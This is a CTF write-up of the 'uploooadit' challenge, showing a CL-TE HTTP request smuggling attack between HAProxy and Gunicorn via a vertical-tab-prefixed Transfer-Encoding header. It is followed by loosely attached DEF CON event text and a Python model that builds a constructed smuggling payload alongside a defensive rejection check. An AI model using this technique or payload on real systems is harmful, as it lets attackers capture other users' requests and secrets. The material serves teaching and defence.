The CTF had a web challenge, uploooadit, which I quite liked due to my affection for the HTTP Desync attack. The Flask application given (app.py, store.py) had two endpoints:

1. The upload endpoint, POST /files, was used to save plain-text files to the blob storage. It took Content-Type: text/plain and a custom header X-guid containing an id, an identifier for the file so it can be fetched later.
2. Provided a valid guid, we get to fetch the saved file back with the second endpoint (the GET /files/<guid> route used at the end of this write-up).

And if we send an invalid request to an invalid endpoint, the error response reveals the frontend HTTP server being used. So we have a frontend server, HAProxy 1.9.10, and a backend app written in Flask, served by the Gunicorn WSGI server. After the usual assessment, the simple scenario and code leave us with only one thing to test: an HTTP Desync between HAProxy and Gunicorn.

The Desync on its own can only help us poison the backend server's sockets. But if we assume that there is a bot hitting the backend server at intervals with the flag in its HTTP request, then the whole scenario starts making sense. But first, let's get the HTTP Desync working. The piece here by Nathan Davison came in handy.

As it turns out, the combination of HAProxy and Gunicorn is vulnerable to a CL-TE HTTP desync. What we mean by that is: we can send Content-Length (CL) and Transfer-Encoding (TE) together, but if we malform the value of Transfer-Encoding slightly by prepending a non-printable character such as "\x0b" (vertical tab) or "\x0c" (form feed), HAProxy ignores the TE header and gives precedence to CL, whereas when the request is passed on to Gunicorn it parses the TE header successfully and gives precedence to that. So suppose we send a raw request carrying both headers, the malformed TE value, and a second POST request placed inside the Content-Length-sized body.

HAProxy only considers the CL header and forwards the second request to Gunicorn as the body of the first. But when Gunicorn parses the TE header, it breaks the above raw request into two POST requests: the first is a normal, complete request that ends at the 0-byte chunk of the Transfer-Encoding body, and the second is our poison for the TCP socket, carrying Content-Length: 385. Gunicorn will wait for the next HTTP/TCP packet until 385 bytes of body have arrived.

And, as we assumed, if there is a flag bot which submits an HTTP request to the backend at some interval, we can steal its request by making it land right after our poison: the bot's raw HTTP request then becomes the body of our poison POST /files request, is stored through that endpoint, and can be retrieved through GET /files/2aaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa.

The exploit request uses Transfer-Encoding:\vchunked. And we get the flag at GET /files/2aaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa.

HTTP Desync is quite fun and prevalent, considering the modern architecture that web apps are built on these days. Some rabbit holes I followed in previous CTFs on HTTP Desync definitely helped me solve this one in minutes. The quals spanned 2 days, starting from May 16th UTC. On another note, I play for UnderDawgs; if you are looking for a team and are a nerd for maths, crypto, and reversing, please hit us up.

For a little while, we may still chat on DEF CON's official discord (CTF area). (CTFtime - timeanddate) Open-source releases are on github/o-o-overflow. PCAPs are available for: babymaze, biooosless, blursed, bytecoooding, coooppersmith, cursed, dogooos, fungez, interrupted, introool, keml, lifebooox, mamamaze, maybe, nooopsled, notbefoooled, ooo-flag-sharing, ooobash, ooofs, ooonline-class, ooonline-gradclass, supersafecalc, whooo-are-u (and its helper endpoint). Check out Sirgoon and our friends at Hack-A-Sat, who provided the guest challenge interrupted.

Only the world's top teams make it to DEF CON. This enables the event to explore the cutting edge of the amazing things that the world's hackers are capable of. But the trick, of course, is figuring out who these hackers are. In CTF, this is done through cut-throat competition. Every year, the DEF CON CTF organizers select a number of prominent events in the CTF community as prequalifiers. The winner of each of these is automatically invited by the Order of the Overflow to compete in DEF CON CTF, and the OOO completes the roster by selecting teams through our own qualification round (scheduled this year for March 27th!) as well as last year's DEF CON champion. We select pre-qualifying events according to several considerations. We always look for quality events that present a variety of interesting challenges to their participants. We look for both prominent events with an established history and promising up-and-comers.
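To make the CL-TE disagreement described above concrete, here is an added example (not code from this write-up, the challenge, HAProxy or Gunicorn): a small Python model of two HTTP/1.1 parsers reading the same byte stream, plus the check a front end can apply to refuse requests that two parsers could read differently. The "strict" parser only honours Transfer-Encoding when its value is exactly "chunked" after trimming RFC 7230 optional whitespace (SP / HTAB) and otherwise falls back to Content-Length; the "lenient" parser trims with Python's str.strip(), which also removes 0x0b and 0x0c. That lenient trimming is an assumption standing in for the back-end behaviour the text describes, not Gunicorn's own implementation, and the sample stream, the host name example.test and the first request's guid are constructed.

```python
"""Two toy HTTP/1.1 parsers that disagree over one byte stream (added example).

"strict" honours Transfer-Encoding only when its value is exactly "chunked"
after trimming SP/HTAB, else uses Content-Length (how the write-up describes
HAProxy). "lenient" trims with str.strip(), which also drops 0x0b/0x0c, so it
honours the chunked encoding. The lenient rule is an assumption, not
Gunicorn's code. reject_ambiguous() is the defensive check for such requests.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

CRLF = b"\r\n"


@dataclass
class Request:
    method: str
    target: str
    headers: Dict[str, str]      # lower-cased names -> raw (untrimmed) values
    body: bytes
    complete: bool = True        # False while the parser still waits for body bytes
    pending: int = 0             # body bytes still owed when complete is False


def _parse_head(buf: bytes) -> Tuple[str, str, Dict[str, str], bytes]:
    """Split the request line and header block off buf; return the remainder."""
    head, _, rest = buf.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    method, target, _version = lines[0].decode("latin-1").split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value
    return method, target, headers, rest


def _is_chunked(value: Optional[str], lenient: bool) -> bool:
    if value is None:
        return False
    trimmed = value.strip() if lenient else value.strip(" \t")
    return trimmed.lower() == "chunked"


def _read_chunked(data: bytes) -> Tuple[bytes, bytes]:
    """Decode a chunked body; return (body, bytes left after the 0-size chunk)."""
    body = b""
    while True:
        size_line, _, data = data.partition(CRLF)
        size = int(size_line.split(b";")[0], 16)
        if size == 0:
            _, _, data = data.partition(CRLF)   # empty trailer section
            return body, data
        body += data[:size]
        data = data[size + 2:]                  # skip chunk-data and its CRLF


def parse_stream(buf: bytes, lenient: bool) -> List[Request]:
    """Return every request this parser believes the buffer contains."""
    out: List[Request] = []
    while buf:
        method, target, headers, buf = _parse_head(buf)
        if _is_chunked(headers.get("transfer-encoding"), lenient):
            body, buf = _read_chunked(buf)
            out.append(Request(method, target, headers, body))
            continue
        length = int(headers.get("content-length", "0").strip())
        body, buf = buf[:length], buf[length:]
        if len(body) < length:
            # Body not on the wire yet: a real server blocks on the socket here,
            # and whatever arrives next on the connection becomes this body.
            out.append(Request(method, target, headers, body, False, length - len(body)))
        else:
            out.append(Request(method, target, headers, body))
    return out


def reject_ambiguous(headers: Dict[str, str]) -> Optional[str]:
    """Return a rejection reason for a request two parsers could disagree on."""
    te = headers.get("transfer-encoding")
    if te is None:
        return None
    if any((ord(c) < 0x20 and c not in " \t") or c == "\x7f" for c in te):
        return "control character in Transfer-Encoding"
    if "content-length" in headers:
        return "both Content-Length and Transfer-Encoding present"
    return None


# Constructed sample (not captured from the challenge): a chunked first request
# whose Transfer-Encoding value is prefixed with 0x0b, then a second POST whose
# Content-Length exceeds the bytes that follow it.
SECOND = (
    b"POST /files HTTP/1.1\r\nHost: example.test\r\nContent-Type: text/plain\r\n"
    b"X-guid: 2aaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\r\nContent-Length: 385\r\n\r\n"
)
CHUNKED_BODY = b"1\r\nA\r\n0\r\n\r\n"
FIRST_HEAD = (
    b"POST /files HTTP/1.1\r\nHost: example.test\r\nContent-Type: text/plain\r\n"
    b"X-guid: 1aaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\r\nTransfer-Encoding:\x0bchunked\r\n"
    b"Content-Length: " + str(len(CHUNKED_BODY) + len(SECOND)).encode() + b"\r\n\r\n"
)
SAMPLE = FIRST_HEAD + CHUNKED_BODY + SECOND


def compare(buf: bytes = SAMPLE) -> Tuple[int, int]:
    """How many requests the strict and the lenient parser see in buf."""
    return len(parse_stream(buf, lenient=False)), len(parse_stream(buf, lenient=True))


if __name__ == "__main__":
    print("strict/lenient request counts:", compare())
    for req in parse_stream(SAMPLE, lenient=True):
        print(req.method, req.target, req.headers["x-guid"].strip(), req.complete, req.pending)
    print("front-end check:", reject_ambiguous(parse_stream(SAMPLE, lenient=False)[0].headers))
```

The strict parser sees one complete POST; the lenient one sees the same bytes as two POSTs, the second still waiting for 385 bytes of body, which is the poisoned socket the text describes. The hardening check refuses either a control character in Transfer-Encoding or CL and TE together, so the request never reaches a back end that could read it differently.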